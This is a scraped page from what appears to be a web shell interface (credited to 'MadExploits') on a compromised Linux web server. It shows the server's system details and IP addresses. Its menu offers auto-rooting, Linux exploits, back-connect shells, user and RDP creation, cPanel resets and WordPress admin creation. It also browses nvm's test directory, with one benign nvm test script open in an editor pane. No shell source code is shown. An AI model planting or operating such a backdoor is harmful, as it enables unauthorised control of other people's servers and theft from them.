Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.137.180.196
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nvm /
test /
fast /
[ HOME SHELL ]
Name
Size
Permission
Action
Aliases
[ DIR ]
drwxrwxr-x
Listing paths
[ DIR ]
drwxrwxr-x
Listing versions
[ DIR ]
drwxrwxr-x
Set Colors
[ DIR ]
drwxrwxr-x
Unit tests
[ DIR ]
drwxrwxr-x
Running "nvm alias" should cre...
109
B
-rwxrwxr-x
Running "nvm current" should d...
229
B
-rwxrwxr-x
Running "nvm deactivate" shoul...
973
B
-rwxrwxr-x
Running "nvm install" with "--...
2.45
KB
-rwxrwxr-x
Running "nvm install" with an ...
375
B
-rwxrwxr-x
Running "nvm unalias" should r...
147
B
-rwxrwxr-x
Running "nvm uninstall" should...
116
B
-rwxrwxr-x
Running "nvm uninstall" with i...
320
B
-rwxrwxr-x
Running "nvm unload" should un...
685
B
-rwxrwxr-x
Running "nvm use foo" where "f...
992
B
-rwxrwxr-x
Running "nvm use iojs" uses la...
1
KB
-rwxrwxr-x
Running "nvm use system" shoul...
1.52
KB
-rwxrwxr-x
Running "nvm use x" should cre...
770
B
-rwxrwxr-x
Running "nvm use x" should not...
1.98
KB
-rwxrwxr-x
Running "nvm use" should drop ...
512
B
-rwxrwxr-x
Sourcing nvm.sh should make th...
41
B
-rwxrwxr-x
Sourcing nvm.sh should not mod...
62
B
-rwxrwxr-x
nvm should remove the last tra...
395
B
-rw-rw-r--
setup
189
B
-rwxrwxr-x
setup_dir
195
B
-rwxrwxr-x
teardown
196
B
-rwxrwxr-x
teardown_dir
157
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Running "nvm use system" should work as expected
#!/bin/sh set -eux cleanup() { unset -f nvm_has_system_node nvm_print_npm_version } die() { echo "$@" ; cleanup ; exit 1; } \. ../../nvm.sh nvm_has_system_node() { return 0; } nvm_print_npm_version() { command printf ' (npm v1.2.3)'; } EXPECTED_OUTPUT="Now using system version of node: $(node -v)$(nvm_print_npm_version)" set +x # since stderr is needed OUTPUT="$(nvm use system 2>&1)" set -x [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "Could not use system version of node. Got >${OUTPUT}<, expected >${EXPECTED_OUTPUT}<" EXPECTED_OUTPUT="" set +x # since stderr is needed OUTPUT="$(nvm use --silent system 2>&1 | tail -1)" set -x [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "Could not use system version of node or --silent was not silent" nvm_has_system_node() { return 1; } nvm_print_npm_version() { command printf ''; } EXPECTED_OUTPUT="System version of node not found." set +x # since stderr is needed OUTPUT="$(nvm use system 2>&1 | tail -1)" set -x [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "Did not report error, system node not found" nvm use system 2>&1 > /dev/null || [ $? -eq 127 ] || die "Did not return error code, system node not found" EXPECTED_OUTPUT="" set +x # since stderr is needed OUTPUT="$(nvm use --silent system 2>&1 | tail -1)" set -x [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "Did not report error, system node not found or --silent was not silent" nvm use --silent system 2>&1 > /dev/null || [ $? -eq 127 ] || die "Did not return error code, system node not found or --silent was not silent" cleanup
Close